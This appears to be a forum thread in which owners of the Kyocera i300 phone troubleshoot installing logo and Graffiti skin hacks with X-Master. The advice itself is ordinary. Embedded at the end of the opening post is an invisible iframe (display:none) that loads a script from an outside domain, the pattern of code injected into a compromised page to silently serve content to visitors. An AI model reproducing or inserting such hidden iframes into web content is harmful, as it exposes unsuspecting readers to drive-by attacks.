OK guys/girls, dumb question. First though, being relatively new to the i300 I have found this forum to be an incredible source to figuring out the phone and how to make the most use of it.
I have ben reading the threads on skins, and attempted to download and play with them. As far as I can tell from my sync log they downloaded to the i300 without a hitch. Question:
1) Where are they located on the phone?
2) Someone please, like I'm a 2 year old, step by step tell me how to install and configure the phone so that I can actually see them. Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Frank- you need to have XMaster loaded as well. Click on the XMaster icon & a list of hacks will appear, then choose either logo or graffiti from there.
Thanks Pete-although I have Xmaster installed it is telling me that I have no hacks installed on the phone I have installed several .prc files prior to and after installing XMaster. According to the log they downloaded successfully. What am I missing?
lol....couldn't have been that easy. Under the pull-down Extensions menu in XMaster, tap "List all active". The Logo & Graffiti hacks should list under the extension patch "WinDrawBitmap" if they are active and the patch is there. Can't remember if the patch loaded with the hacks or not but if they don't list, I would delete 'em & reinstall per the hack instructions.
1) Under the pulldown menu X-Master|List Active Extensions nothing shows up
2) I don't know where they are, so if they ARE on the device, I can't delete them
3) In the forum, I have seen multiple .prc files folks have generously provided, but no instructions on how to install them
On the delete screen do the hacks appear? Try deleting all and then installing the skins and logos one at a time. Repeat, install 1 skin and 1 logo and see what happens.
There are two types of skins for the I300: Logo & Graffitti
First you have to download the hack (either logohack or graffitthack ... or both). Then, you download the pics. The website listed below is a good source for the hacks and the skins.
I don't have my husband's I300 in front of me, but I believe you click on the hack, then click on Configure.
At that time (I think) you choose which picture you want for your logo replacement (if you are configuring the Logohack) or graffitti replacement (if you are configuring the Graffittihack).
